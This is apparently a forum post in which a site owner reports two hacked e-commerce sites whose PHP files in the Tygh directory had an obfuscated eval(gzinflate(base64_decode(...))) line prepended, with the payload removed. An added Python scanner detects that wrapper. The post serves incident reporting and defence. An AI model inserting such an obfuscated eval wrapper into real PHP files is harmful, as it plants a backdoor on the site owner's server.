Two of my sites were hacked today.
One is running 4.1.3, the other 4.1.5.
Development sites running on the same server were not hacked, and the hacks resulted in “500 Server Error” and were thus not functional.
I am therefore thinking that this is a front end attack, not shell access.
The files modified were all in the Tygh directory. You can identify the exact files hacked by going through the apache2 error.log and seeing which file breaks the server (e.g. Database.php). This is what is appended to the first line of the affected PHP files:
```
<?php eval(gzinflate(base64_decode('[encoded payload removed]')));?>
```
I am running PHP 5.5 and Apache 2.4 and presently have mod_security disabled. That is getting corrected as I speak.
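
A defender's check for the injection described in the post above, added here as an example and not part of the original post: it walks a directory tree and flags `.php` files whose first line carries the `eval(gzinflate(base64_decode('...')))` wrapper, reporting the modification time to help build a timeline. The function names and the whitespace tolerance in the pattern are assumptions.

```python
import re
import sys
import time
from pathlib import Path

# Matches the wrapper quoted in the post: a self-contained <?php ... ?> tag that
# evals a gzinflate'd, base64-decoded string literal. Tolerating extra whitespace
# and either quote style is an assumption, not something the post shows.
INJECT_RE = re.compile(
    rb"<\?php\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    rb"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?\s*\?>",
    re.IGNORECASE,
)

def scan_file(path):
    """Return a finding dict if the file's first line carries the wrapper, else None."""
    try:
        with open(path, "rb") as fh:
            first_line = fh.readline()  # the post says the code sits on line one
        mtime = path.stat().st_mtime
    except OSError:
        return None  # unreadable file: skip rather than abort the whole scan
    match = INJECT_RE.search(first_line)
    if match is None:
        return None
    return {
        "path": str(path),
        "offset": match.start(),               # byte offset of the wrapper in line one
        "payload_chars": len(match.group(2)),  # size of the encoded blob, never decoded
        "mtime": mtime,                        # when the file was last modified
    }

def scan_tree(root):
    """Scan every .php file under root and return the list of findings."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        if path.is_file():
            hit = scan_file(path)
            if hit is not None:
                findings.append(hit)
    return findings

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for hit in scan_tree(root):
        stamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(hit["mtime"]))
        print(f'{stamp}  {hit["path"]}  payload={hit["payload_chars"]} chars')
```

Run it against the web root and compare the reported files with a known-good copy of the same release before restoring them.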